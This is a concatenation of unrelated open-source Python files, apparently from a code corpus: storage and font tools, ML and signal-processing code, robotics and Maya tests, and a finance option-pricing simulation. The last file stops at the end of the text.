# # Copyright(c) 2020-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # import os import pytest from api.cas import casadm from api.cas.cache_config import CacheMode from core.test_run import TestRun from storage_devices.disk import DiskTypeSet, DiskType, DiskTypeLowerThan from test_tools.dd import Dd from test_tools.disk_utils import Filesystem from test_utils.filesystem.file import File from test_utils.os_utils import drop_caches, DropCachesMode, sync from test_utils.size import Size, Unit mount_point = "/mnt/test" @pytest.mark.require_disk("cache", DiskTypeSet([DiskType.optane, DiskType.nand])) @pytest.mark.require_disk("core", DiskTypeLowerThan("cache")) @pytest.mark.parametrizex("cache_mode", CacheMode) @pytest.mark.parametrizex("filesystem", Filesystem) @pytest.mark.parametrizex("reboot_type", ["soft", "hard"]) @pytest.mark.require_plugin("power_control") def test_load_after_clean_shutdown(reboot_type, cache_mode, filesystem): """ title: Planned system shutdown test. description: Test for data consistency after clean system shutdown. pass_criteria: - DUT should reboot successfully. - Checksum of file on core device should be the same before and after reboot. """ with TestRun.step("Prepare CAS device."): cache_disk = TestRun.disks['cache'] cache_disk.create_partitions([Size(1, Unit.GibiByte)]) cache_dev = cache_disk.partitions[0] core_dev = TestRun.disks['core'] cache = casadm.start_cache(cache_dev, cache_mode, force=True) core = cache.add_core(core_dev) core.create_filesystem(filesystem, blocksize=int(Size(1, Unit.Blocks4096))) core.mount(mount_point) with TestRun.step("Create file on cache and count its checksum."): test_file = File(os.path.join(mount_point, "test_file")) Dd()\ .input("/dev/zero")\ .output(test_file.full_path)\ .block_size(Size(1, Unit.KibiByte))\ .count(1024)\ .run() test_file.refresh_item() test_file_md5 = test_file.md5sum() sync() drop_caches(DropCachesMode.ALL) with TestRun.step("Reset platform."): if reboot_type == "soft": TestRun.executor.reboot() else: power_control = TestRun.plugin_manager.get_plugin('power_control') power_control.power_cycle() with TestRun.step("Load cache."): casadm.load_cache(cache_dev) core.mount(mount_point) with TestRun.step("Check file md5sum."): test_file.refresh_item() if test_file_md5 != test_file.md5sum(): TestRun.LOGGER.error("Checksums does not match - file is corrupted.") else: TestRun.LOGGER.info("File checksum is correct.") with TestRun.step("Remove test file."): test_file.remove()
ml-models-analyses/readahead-mixed-workload/kmlparsing.py
drewscottt/kernel-ml
167
30651
<filename>ml-models-analyses/readahead-mixed-workload/kmlparsing.py<gh_stars>100-1000 # # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2021-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2020-2021 <NAME> # Copyright (c) 2019-2021 <NAME> # Copyright (c) 2019-2021 Stony Brook University # Copyright (c) 2019-2021 The Research Foundation of SUNY # # You can redistribute it and/or modify it under the terms of the Apache License, # Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0). # from collections import defaultdict import re import sys import os def find_avg_faults(time_values): x = [] y = [] for vals in time_values: t_delta = vals[0] maj_faults = vals[1] avg = maj_faults / t_delta prev = x[-1] if len(x) else 0 x.append(prev + t_delta) y.append(avg) return x, y def avg(data): total = 0 for duration, x in data: total += x return total/len(data) def weighted_avg(data): time = 0 total = 0 for duration, x in data: time += duration total += duration * x return total/time def parse_bench_time_values(values_dict, fn, workloads): start = re.compile(r'\tCommand being timed: "\S+ --benchmarks=(\w+)') elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)') major = re.compile(r'\tMajor \(requiring I/O\) page faults: (\d+)') minor = re.compile(r'\tMinor \(reclaiming a frame\) page faults: (\d+)') inputs = re.compile(r'\tFile system inputs: (\d+)') outputs = re.compile(r'\tFile system outputs: (\d+)') end = re.compile(r'\tExit status: \d+') with open(fn) as f: for line in f.readlines(): match = start.match(line) if match: curr_workload = match.group(1) load_set = set(workloads) load_set.remove(curr_workload) other_workload = load_set.pop() workload = values_dict[(curr_workload, other_workload)] data = [] match = elap.match(line) if match: sec = 60 * int(match.group(1)) sec += float(match.group(2)) data.append(sec) for exp in [major, minor, inputs, outputs]: match = exp.match(line) if match: data.append(int(match.group(1))) break match = end.match(line) if match: workload.append(data) def parse_bench_ops_sec(values_dict, fn): start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.* (\d+) ops/sec;\s+([0-9\.]+) MB/s') rwrandomstart = re.compile(r'readrandomwriterandom\s*:.* (\d+) ops/sec;') total_occ_dict = {} with open(fn) as f: data = None for line in f.readlines(): if data == None: match = start.match(line) if match: curr_workload = match.group(1) ops = match.group(4) values_dict.setdefault(curr_workload, 0) values_dict[curr_workload] += int(ops) total_occ_dict.setdefault(curr_workload, 0) total_occ_dict[curr_workload] += 1 data = None match = rwrandomstart.match(line) if match: curr_workload = 'readrandomwriterandom' ops = match.group(1) values_dict.setdefault(curr_workload, 0) values_dict[curr_workload] += int(ops) total_occ_dict.setdefault(curr_workload, 0) total_occ_dict[curr_workload] += 1 data = None continue for key in total_occ_dict.keys(): values_dict[key] /= total_occ_dict[key] def parse_bench_throughput(values_dict, fn, workloads): start = re.compile(r'(read(seq|reverse)|readrandom(writerandom)?|mixgraph)\s*:.*;\s+([0-9\.]+) MB/s') rwrandomstart = re.compile(r'readrandomwriterandom\s*:.*;') elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)') end = re.compile(r'\tExit status: \d+') with open(fn) as f: data = None for line in f.readlines(): if data == None: match = start.match(line) if match: curr_workload = match.group(1) load_set = set(workloads) load_set.remove(curr_workload) other_workload = load_set.pop() workload = values_dict[(curr_workload, other_workload)] throughput = match.group(4) data = [0, float(throughput)] # jk we don't need elap time and sometimes output gets intermixed workload.append(data) data = None match = rwrandomstart.match(line) if match: curr_workload = 'readrandomwriterandom' load_set = set(workloads) load_set.remove(curr_workload) other_workload = load_set.pop() workload = values_dict[(curr_workload, other_workload)] data = [0, 1] # jk we don't need elap time and sometimes output gets intermixed workload.append(data) data = None continue match = elap.match(line) if match: sec = 60 * int(match.group(1)) sec += float(match.group(2)) data.insert(0, sec) continue match = end.match(line) if match: workload.append(data) data = None def generate_combos(): wkload_combos = [] # needs to be in same order as iterated through in generate-result-*.sh for seq in ["readseq", "readreverse"]: #for rand in ["readrandom", "readrandomwriterandom"]: #for rand in ["mixgraph"]: for rand in ["readrandom", "readrandomwriterandom", "mixgraph"]: wkload_combos.append((seq,rand)) return wkload_combos def parse_detail_file(dict_exp, file_path) -> defaultdict: combos = generate_combos() i = 0 with open(os.path.join(os.curdir, file_path)) as f: lines = f.readlines() curr_exp = None for line in lines: values = line.split() if len(values) == 2: if values[1] == '1': curr_exp = values[0] while curr_exp not in combos[i]: i += 1 if i == len(combos): print(f'detail file {file_path} badly formatted') print(f'{curr_exp} not in combos {combos}') sys.exit(1) background_exp = set(combos[i]) background_exp.remove(curr_exp) background_exp = background_exp.pop() curr_exp = (curr_exp, background_exp) i += 1 elif values[0] not in curr_exp: print(f'detail file {file_path} badly formatted') sys.exit(1) else: if curr_exp == None: print(f'detail file {file_path} badly formatted') sys.exit(1) x = 0 if len(dict_exp[curr_exp]) == 0 else dict_exp[curr_exp][-1][0] + float(values[4]) dict_exp[curr_exp].append([x, float(values[2])]) return dict_exp def parse_kern_log_file(file_path) -> defaultdict: dict_exp = defaultdict(list) with open(os.path.join(os.curdir, file_path)) as f: lines = f.readlines() for line in lines: values = line.split() if len(values) == 2: curr_exp = tuple(values) elif values[5] == 'readahead': dict_exp[curr_exp].append(float(values[8])) return dict_exp def mean(arr): return sum(arr)/len(arr)
network/demo_espat_ap_test.py
708yamaguchi/MaixPy_scripts
485
30655
<reponame>708yamaguchi/MaixPy_scripts # This file is part of MaixPY # Copyright (c) sipeed.com # # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license.php # from network_espat import wifi wifi.reset() print(wifi.at_cmd("AT\r\n")) print(wifi.at_cmd("AT+GMR\r\n")) ''' >>> reset... b'\r\n\r\nOK\r\n' b'AT version:1.1.0.0(May 11 2016 18:09:56)\r\nSDK version:1.5.4(baaeaebb)\r\ncompile time:May 20 2016 15:06:44\r\nOK\r\n' MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210 Type "help()" for more information. >>> '''
stockroom_bot/stock_products.py
amjadmajid/rosbook
442
30660
<filename>stockroom_bot/stock_products.py #!/usr/bin/env python import rospy, tf from gazebo_msgs.srv import * from geometry_msgs.msg import * if __name__ == '__main__': rospy.init_node("stock_products") rospy.wait_for_service("gazebo/delete_model") # <1> rospy.wait_for_service("gazebo/spawn_sdf_model") delete_model = rospy.ServiceProxy("gazebo/delete_model", DeleteModel) s = rospy.ServiceProxy("gazebo/spawn_sdf_model", SpawnModel) orient = Quaternion(*tf.transformations.quaternion_from_euler(0, 0, 0)) with open("models/product_0/model.sdf", "r") as f: product_xml = f.read() # <2> for product_num in xrange(0, 12): item_name = "product_{0}_0".format(product_num) delete_model(item_name) # <3> for product_num in xrange(0, 12): bin_y = 2.8 * (product_num / 6) - 1.4 # <4> bin_x = 0.5 * (product_num % 6) - 1.5 item_name = "product_{0}_0".format(product_num) item_pose = Pose(Point(x=bin_x, y=bin_y, z=2), orient) # <5> s(item_name, product_xml, "", item_pose, "world") # <6>
openspeech/search/beam_search_ctc.py
techthiyanes/openspeech
207
30676
<reponame>techthiyanes/openspeech<filename>openspeech/search/beam_search_ctc.py<gh_stars>100-1000 # MIT License # # Copyright (c) 2021 <NAME> and <NAME> and <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import torch.nn as nn from openspeech.utils import CTCDECODE_IMPORT_ERROR class BeamSearchCTC(nn.Module): r""" Decodes probability output using ctcdecode package. Args: labels (list): the tokens you used to train your model lm_path (str): the path to your external kenlm language model(LM). alpha (int): weighting associated with the LMs probabilities. beta (int): weight associated with the number of words within our beam cutoff_top_n (int): cutoff number in pruning. Only the top cutoff_top_n characters with the highest probability in the vocab will be used in beam search. cutoff_prob (float): cutoff probability in pruning. 1.0 means no pruning. beam_size (int): this controls how broad the beam search is. num_processes (int): parallelize the batch using num_processes workers. blank_id (int): this should be the index of the CTC blank token Inputs: logits, sizes - logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t - sizes: Size of each sequence in the mini-batch Returns: - outputs: sequences of the model's best prediction """ def __init__( self, labels: list, lm_path: str = None, alpha: int = 0, beta: int = 0, cutoff_top_n: int = 40, cutoff_prob: float = 1.0, beam_size: int = 3, num_processes: int = 4, blank_id: int = 0, ) -> None: super(BeamSearchCTC, self).__init__() try: from ctcdecode import CTCBeamDecoder except ImportError: raise ImportError(CTCDECODE_IMPORT_ERROR) assert isinstance(labels, list), "labels must instance of list" self.decoder = CTCBeamDecoder(labels, lm_path, alpha, beta, cutoff_top_n, cutoff_prob, beam_size, num_processes, blank_id) def forward(self, logits, sizes=None): r""" Decodes probability output using ctcdecode package. Inputs: logits, sizes logits: Tensor of character probabilities, where probs[c,t] is the probability of character c at time t sizes: Size of each sequence in the mini-batch Returns: outputs: sequences of the model's best prediction """ logits = logits.cpu() outputs, scores, offsets, seq_lens = self.decoder.decode(logits, sizes) return outputs
spinoffs/inference_gym/inference_gym/targets/eight_schools_test.py
PavanKishore21/probability
3,670
30679
# Copyright 2020 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Tests for inference_gym.targets.eight_schools.""" import tensorflow.compat.v2 as tf from inference_gym.internal import test_util from inference_gym.targets import eight_schools @test_util.multi_backend_test(globals(), 'targets.eight_schools_test') class EightSchoolsTest(test_util.InferenceGymTestCase): def testEightSchools(self): """Checks that unconstrained parameters yield finite joint densities.""" model = eight_schools.EightSchools() self.validate_log_prob_and_transforms( model, sample_transformation_shapes=dict(identity={ 'avg_effect': [], 'log_stddev': [], 'school_effects': [8], }), check_ground_truth_mean_standard_error=True, check_ground_truth_mean=True, check_ground_truth_standard_deviation=True) @test_util.numpy_disable_gradient_test def testEightSchoolsHMC(self): """Checks approximate samples from the model against the ground truth.""" model = eight_schools.EightSchools() self.validate_ground_truth_using_hmc( model, num_chains=4, num_steps=4000, num_leapfrog_steps=10, step_size=0.4, ) if __name__ == '__main__': tf.test.main()
pylayers/antprop/examples/ex_meta.py
usmanwardag/pylayers
143
30696
from pylayers.gis.layout import * from pylayers.antprop.signature import * from pylayers.antprop.channel import * import pylayers.signal.waveform as wvf import networkx as nx import numpy as np import time import logging L = Layout('WHERE1_clean.ini') #L = Layout('defstr2.ini') try: L.dumpr() except: L.build() L.dumpw() #L.build() #L.dumpw() #L.buildGi() nc1 = 6#5 nc2 = 25#37 poly1 = L.Gt.node[nc1]['polyg'] cp1 = poly1.centroid.xy poly2 = L.Gt.node[nc2]['polyg'] cp2 = poly2.centroid.xy ptx = np.array([cp1[0][0],cp1[1][0],1.5]) prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5]) print ptx print prx d = np.sqrt(np.dot((ptx-prx),(ptx-prx))) tau = d/0.3 print d,tau logging.info('Signature') S = Signatures(L,nc1,nc2) a =time.time() logging.info('Calculate signature') #S.run2(cutoff=6,dcut=3) S.run(cutoff=2) b=time.time() print b-a for i in L.Gi.nodes(): ei = eval(i) if type(ei)!= int: if ei[0] == 354: print i #Gsi.add_node('Tx') #Gsi.pos['Tx']=tuple(ptx[:2]) #for i in L.Gt.node[nc1]['inter']: # if i in Gsi.nodes(): # Gsi.add_edge('Tx',i) #Gsi.add_node('Rx') #Gsi.pos['Rx']=tuple(prx[:2]) #for i in L.Gt.node[nc2]['inter']: # if i in Gsi.nodes(): # Gsi.add_edge(i,'Rx') #print 'signatures' #co = nx.dijkstra_path_length(Gsi,'Tx','Rx') #sig=list(nx.all_simple_paths(Gsi,'Tx','Rx',cutoff=co+2)) #b=time.time() #print b-a #f,ax=L.showG('t') #nx.draw(Gsi,Gsi.pos,ax=ax) #plt.show() ##S.run(L,metasig,cutoff=3) #print "r = S.rays " r = S.rays(ptx,prx) print "r3 = r.to3D " r3 = r.to3D() print "r3.locbas " r3.locbas(L) #print "r3.fillinter " r3.fillinter(L) r3.show(L) plt.show() ## #config = ConfigParser.ConfigParser() #_filesimul = 'default.ini' #filesimul = pyu.getlong(_filesimul, "ini") #config.read(filesimul) #fGHz = np.linspace(eval(config.get("frequency", "fghzmin")), # eval(config.get("frequency", "fghzmax")), # eval(config.get("frequency", "nf"))) # #Cn=r3.eval(fGHz) # #Cn.freq=Cn.fGHz #sco=Cn.prop2tran(a='theta',b='theta') #wav = wvf.Waveform() #ciro = sco.applywavB(wav.sfg) # ##raynumber = 4 # ##fig=plt.figure('Cpp') ##f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber]))) # ##r3d.info(raynumber) ## plt.show() ## ## ## ### ###c11 = r3d.Ctilde[:,:,0,0] ###c12 = r3d.Ctilde[:,:,0,1] ###c21 = r3d.Ctilde[:,:,1,0] ###c22 = r3d.Ctilde[:,:,1,1] ### ### ### ###Cn=Ctilde() ###Cn.Cpp = bs.FUsignal(r3d.I.f, c11) ###Cn.Ctp = bs.FUsignal(r3d.I.f, c12) ###Cn.Cpt = bs.FUsignal(r3d.I.f, c21) ###Cn.Ctt = bs.FUsignal(r3d.I.f, c22) ###Cn.nfreq = r3d.I.nf ###Cn.nray = r3d.nray ###Cn.tauk=r3d.delays ### ###raynumber = 4 ### ###fig=plt.figure('Cpp') ###f,ax=Cn.Cpp.plot(fig=fig,iy=np.array(([raynumber]))) ### ## ## ## ## ## ##
package/awesome_panel/application/services/message_service.py
Jhsmit/awesome-panel
179
30712
"""This module implements the MessageService The MessageService enables sending and receiving messages """ import param class MessageService(param.Parameterized): """The MessageService enables sending and receiving messages"""
herokuapp/project_template/manage.py
urkonn/django-herokuapp
262
30714
<filename>herokuapp/project_template/manage.py #!/usr/bin/env python import os import sys if __name__ == "__main__": # Load the Heroku environment. from herokuapp.env import load_env load_env(__file__, "{{ app_name }}") os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{{ project_name }}.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)
scripts/touchup_for_web.py
BennZoll/roboto
3,933
30719
<reponame>BennZoll/roboto<gh_stars>1000+ #!/usr/bin/python # # Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Post-build web fonts changes for Roboto.""" import sys from fontTools import ttLib from nototools import font_data import temporary_touchups def apply_web_specific_fixes(font, unhinted, family_name): """Apply fixes needed for web fonts.""" # set vertical metrics to old values hhea = font['hhea'] hhea.ascent = 1900 hhea.descent = -500 os2 = font['OS/2'] os2.sTypoAscender = 1536 os2.sTypoDescender = -512 os2.sTypoLineGap = 102 os2.usWinAscent = 1946 os2.usWinDescent = 512 # correct anything else needed for both web and Chrome OS apply_web_cros_common_fixes(font, unhinted, family_name) def apply_web_cros_common_fixes(font, unhinted, family_name): """Apply fixes needed for web and CrOS targets""" subfamily_name = font_data.get_name_records(font)[2].encode('ASCII') assert(subfamily_name in ['Thin', 'Thin Italic', 'Light', 'Light Italic', 'Regular', 'Italic', 'Medium', 'Medium Italic', 'Bold', 'Bold Italic', 'Black', 'Black Italic']) if 'Condensed' in font_data.get_name_records(font)[1]: family_name += ' Condensed' full_name = family_name if subfamily_name != 'Regular': full_name += ' ' + subfamily_name # Family, subfamily names font_data.set_name_record(font, 16, family_name) style_map = ['Regular', 'Bold', 'Italic', 'Bold Italic'] if subfamily_name in style_map: font_data.set_name_record(font, 1, family_name) else: weight = subfamily_name.split()[0] new_family_name = family_name if weight != 'Regular': new_family_name += ' ' + weight font_data.set_name_record(font, 1, new_family_name) # all weights outside regular and bold should only have subfamily # "Regular" or "Italic" italic = subfamily_name.endswith('Italic') font_data.set_name_record(font, 2, style_map[italic << 1]) # Unique identifier and full name font_data.set_name_record(font, 3, full_name) font_data.set_name_record(font, 4, full_name) font_data.set_name_record(font, 18, None) # PostScript name font_data.set_name_record( font, 6, (family_name+'-'+subfamily_name).replace(' ', '')) # Copyright message font_data.set_name_record( font, 0, 'Copyright 2011 Google Inc. All Rights Reserved.') # hotpatch glyphs by swapping # https://github.com/google/roboto/issues/18 glyf = font['glyf'] glyf['chi'], glyf['chi.alt'] = glyf['chi.alt'], glyf['chi'] # make glyph orders consistent for feature copying # https://github.com/google/roboto/issues/71 glyph_order = font.getGlyphOrder() for i, glyph_name in enumerate(glyph_order): if glyph_name.endswith('.lnum'): new_name = glyph_name.replace('.lnum', '.pnum') glyph_order[i] = new_name font['glyf'][new_name] = font['glyf'][glyph_name] # append old name to glyph order so del succeeds glyph_order.append(glyph_name) del font['glyf'][glyph_name] # copy features from unhinted # https://github.com/google/roboto/pull/163 for table in ['GDEF', 'GPOS', 'GSUB']: font[table] = unhinted[table] def correct_font(source_name, unhinted_name, target_font_name, family_name): """Corrects metrics and other meta information.""" font = ttLib.TTFont(source_name) unhinted = ttLib.TTFont(unhinted_name) # apply web-specific fixes before shared, so that sub/family names are # correct for black weights and their bold bits will be set apply_web_specific_fixes(font, unhinted, family_name) temporary_touchups.apply_temporary_fixes(font, is_for_web=True) temporary_touchups.update_version_and_revision(font) font.save(target_font_name) def main(argv): """Correct the font specified in the command line.""" correct_font(*argv[1:]) if __name__ == "__main__": main(sys.argv)
tests/test_losses_config.py
blazejdolicki/vissl
2,512
30729
<reponame>blazejdolicki/vissl # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import logging import unittest from collections import namedtuple from classy_vision.generic.distributed_util import set_cpu_device from parameterized import parameterized from utils import ROOT_LOSS_CONFIGS, SSLHydraConfig from vissl.trainer.train_task import SelfSupervisionTask from vissl.utils.hydra_config import convert_to_attrdict logger = logging.getLogger("__name__") set_cpu_device() BATCH_SIZE = 2048 EMBEDDING_DIM = 128 NUM_CROPS = 2 BUFFER_PARAMS_STRUCT = namedtuple( "BUFFER_PARAMS_STRUCT", ["effective_batch_size", "world_size", "embedding_dim"] ) BUFFER_PARAMS = BUFFER_PARAMS_STRUCT(BATCH_SIZE, 1, EMBEDDING_DIM) class TestRootConfigsLossesBuild(unittest.TestCase): @parameterized.expand(ROOT_LOSS_CONFIGS) def test_loss_build(self, filepath): logger.info(f"Loading {filepath}") cfg = SSLHydraConfig.from_configs( [ filepath, "config.DATA.TRAIN.DATA_SOURCES=[synthetic]", "config.DATA.TEST.DATA_SOURCES=[synthetic]", ] ) _, config = convert_to_attrdict(cfg.default_cfg) task = SelfSupervisionTask.from_config(config) task.datasets, _ = task.build_datasets() self.assertTrue(task._build_loss(), "failed to build loss") def test_pytorch_loss(self): cfg = SSLHydraConfig.from_configs( [ "config=test/integration_test/quick_simclr", "config.LOSS.name=CosineEmbeddingLoss", "+config.LOSS.CosineEmbeddingLoss.margin=1.0", "config.DATA.TRAIN.DATA_SOURCES=[synthetic]", "config.DATA.TEST.DATA_SOURCES=[synthetic]", ] ) _, config = convert_to_attrdict(cfg.default_cfg) task = SelfSupervisionTask.from_config(config) task.datasets, _ = task.build_datasets() self.assertTrue(task._build_loss(), "failed to build loss")
scale/source/apps.py
kaydoh/scale
121
30747
<gh_stars>100-1000 """Defines the application configuration for the source application""" from __future__ import unicode_literals from django.apps import AppConfig class SourceConfig(AppConfig): """Configuration for the source app """ name = 'source' label = 'source' verbose_name = 'Source' def ready(self): """ Override this method in subclasses to run code when Django starts. """ # Register source file parse saver from job.configuration.data.data_file import DATA_FILE_PARSE_SAVER from source.configuration.source_data_file import SourceDataFileParseSaver DATA_FILE_PARSE_SAVER['DATA_FILE_PARSE_SAVER'] = SourceDataFileParseSaver() # Register source message types from messaging.messages.factory import add_message_type from source.messages.purge_source_file import PurgeSourceFile add_message_type(PurgeSourceFile)
Chapter14/c14_11_rainbow_callMaxOn2_viaSimulation.py
John-ye666/Python-for-Finance-Second-Edition
236
30759
""" Name : c14_11_rainbow_callMaxOn2_viaSimulation.py Book : Python for Finance (2nd ed.) Publisher: Packt Publishing Ltd. Author : <NAME> Date : 6/6/2017 email : <EMAIL> <EMAIL> """ import scipy as sp from scipy import zeros, sqrt, shape # sp.random.seed(123) # fix our random numbers s1=100. # stock price 1 s2=95. # stock price 2 k=102.0 # exercise price T=8./12. # maturity in years r=0.08 # risk-free rate rho=0.75 # correlation between 2 sigma1=0.15 # volatility for stock 1 sigma2=0.20 # volatility for stock 1 nSteps=100. # number of steps nSimulation=1000 # number of simulations # # step 1: generate correlated random number dt =T/nSteps call = sp.zeros([nSimulation], dtype=float) x = range(0, int(nSteps), 1) # # step 2: call call prices for j in range(0, nSimulation): x1=sp.random.normal(size=nSimulation) x2=sp.random.normal(size=nSimulation) y1=x1 y2=rho*x1+sp.sqrt(1-rho**2)*x2 sT1=s1 sT2=s2 for i in x[:-1]: e1=y1[i] e2=y2[i] sT1*=sp.exp((r-0.5*sigma1**2)*dt+sigma1*e1*sqrt(dt)) sT2*=sp.exp((r-0.5*sigma2**2)*dt+sigma2*e2*sqrt(dt)) minOf2=min(sT1,sT2) call[j]=max(minOf2-k,0) # # Step 3: summation and discount back call=sp.mean(call)*sp.exp(-r*T) print('Rainbow call on minimum of 2 assets = ', round(call,3))
maya/Tests/joint_test.py
ryu-sw/alembic
921
30774
<reponame>ryu-sw/alembic ##-***************************************************************************** ## ## Copyright (c) 2009-2011, ## <NAME> Imageworks, Inc. and ## Industrial Light & Magic, a division of Lucasfilm Entertainment Company Ltd. ## ## All rights reserved. ## ## Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are ## met: ## * Redistributions of source code must retain the above copyright ## notice, this list of conditions and the following disclaimer. ## * Redistributions in binary form must reproduce the above ## copyright notice, this list of conditions and the following disclaimer ## in the documentation and/or other materials provided with the ## distribution. ## * Neither the name of Sony Pictures Imageworks, nor ## Industrial Light & Magic nor the names of their contributors may be used ## to endorse or promote products derived from this software without specific ## prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT ## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT ## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, ## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT ## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, ## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY ## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT ## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE ## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ## ##-***************************************************************************** from maya import cmds as MayaCmds import maya.OpenMaya as OpenMaya import os import subprocess import unittest import util def createJoints(): name = MayaCmds.joint(position=(0, 0, 0)) MayaCmds.rotate(33.694356, 4.000428, 61.426019, r=True, ws=True) MayaCmds.joint(position=(0, 4, 0), orientation=(0.0, 45.0, 90.0)) MayaCmds.rotate(62.153171, 0.0, 0.0, r=True, os=True) MayaCmds.joint(position=(0, 8, -1), orientation=(90.0, 0.0, 0.0)) MayaCmds.rotate(70.245162, -33.242019, 41.673097, r=True, os=True) MayaCmds.joint(position=(0, 12, 3)) MayaCmds.rotate(0.0, 0.0, -58.973851, r=True, os=True) return name class JointTest(unittest.TestCase): def setUp(self): MayaCmds.file(new=True, force=True) self.__files = [] self.__abcStitcher = [os.environ['AbcStitcher']] def tearDown(self): for f in self.__files: os.remove(f) def testStaticJointRW(self): name = createJoints() # write to file self.__files.append(util.expandFileName('testStaticJoints.abc')) MayaCmds.AbcExport(j='-root %s -file %s' % (name, self.__files[-1])) MayaCmds.select(name) MayaCmds.group(name='original') # read from file MayaCmds.AbcImport(self.__files[-1], mode='import') # make sure the translate and rotation are the same nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"] nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"] for i in range(0, 4): self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4) def testStaticIKRW(self): name = createJoints() MayaCmds.ikHandle(sj=name, ee='joint4') MayaCmds.move(-1.040057, -7.278225, 6.498725, r=True) # write to file self.__files.append(util.expandFileName('testStaticIK.abc')) MayaCmds.AbcExport(j='-root %s -f %s' % (name, self.__files[-1])) MayaCmds.select(name) MayaCmds.group(name='original') # read from file MayaCmds.AbcImport(self.__files[-1], mode='import') # make sure the translate and rotation are the same nodes1 = ["|original|joint1", "|original|joint1|joint2", "|original|joint1|joint2|joint3", "|original|joint1|joint2|joint3|joint4"] nodes2 = ["|joint1", "|joint1|joint2", "|joint1|joint2|joint3", "|joint1|joint2|joint3|joint4"] for i in range(0, 4): self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tx'), MayaCmds.getAttr(nodes2[i]+'.tx'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.ty'), MayaCmds.getAttr(nodes2[i]+'.ty'), 4) self.failUnlessAlmostEqual(MayaCmds.getAttr(nodes1[i]+'.tz'), MayaCmds.getAttr(nodes2[i]+'.tz'), 4) def testAnimIKRW(self): name = createJoints() handleName = MayaCmds.ikHandle(sj=name, ee='joint4')[0] MayaCmds.currentTime(1, update=True) MayaCmds.setKeyframe(handleName, breakdown=0, hierarchy='none', controlPoints=False, shape=False) MayaCmds.currentTime(16, update=True) MayaCmds.move(-1.040057, -7.278225, 